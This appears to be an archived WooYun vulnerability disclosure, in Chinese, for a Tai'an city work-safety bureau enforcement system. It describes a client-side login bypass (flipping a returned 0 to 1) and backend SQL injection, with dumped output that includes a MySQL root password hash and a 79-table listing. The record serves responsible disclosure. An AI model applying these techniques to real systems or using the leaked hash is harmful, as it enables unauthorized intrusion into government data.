乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-19: 细节已通知厂商并且等待厂商处理中 2015-03-24: 厂商已经确认,细节仅向厂商公开 2015-04-03: 细节向核心白帽子及相关领域专家公开 2015-04-13: 细节向普通白帽子公开 2015-04-23: 细节向实习白帽子公开 2015-05-08: 细节向公众公开
泰安市安监局执法系统登录绕过/后台SQL注入
ta-safety.gov.cn
这里点执法系统登录
这里对用户名有敏感字检测。
这里采用了本地验证,密码错误返回0,把它改成1,成功登录。
后台。
SQL注入。
back-end DBMS: MySQL 5database management system users password hashes:[*] root [1]: password hash: *08FC91C5311F21BA2814610E0E386907251E1E9B
back-end DBMS: MySQL 5Database: inspection[79 tables]+-------------------------+| amendnote || annlayermetadata || annlayerstructure || chkcertificate || chkflowstandard || chkinfo || chkquestion || debriefing || declareitem || districtsubdivision || documents || editrecord || emeringcmlog || emeringcmlogtext || enforcement || enteraccident || enterbasic || entercontrol || enterdailychk || enterhiddentrouble || enterimportpart || enterpriseaccident || enterpriseadmincert || enterprisedailychk || enterpriseedutrain || enterprisehiddentrouble || enterpriseimportpart || enterprises || enterprisesecorg || enterprisesecplan || enterprisesecsystem || enterprisespecequip || enterprisespecman || entersafemanage || entersafemanagecert || entersafequalification || enterspecequip || enterspecman || lawstatute || news || newsinfo || oneselftable || overduechkinfo || overduechkquestion || overduerechkinfo || ptdept || ptdictdetail || ptdictmain || ptenudetail || ptenumain || ptlogicact || ptmenu || ptoper || ptoperrole || ptresource || ptroad || ptrole || ptroleres || ptseq || ptword || ptwordspell || rechkcertificate || rechkinfo || rechkquestion || regprovcode || reportcollect || reportmanage || reportputin || resultlog || safedept || safeoper || structdefdetail || structdefmain || taskreport || threesametime || typeinfo || unitpwdtbl || updaterecord || v_workman |+-------------------------+
同上
你们比我更专业
危害等级:中
漏洞Rank:10
确认时间:2015-03-24 10:58
CNVD确认所述情况,已经转由CNCERT下发给分中心,由其后续协调网站管理单位处置。
暂无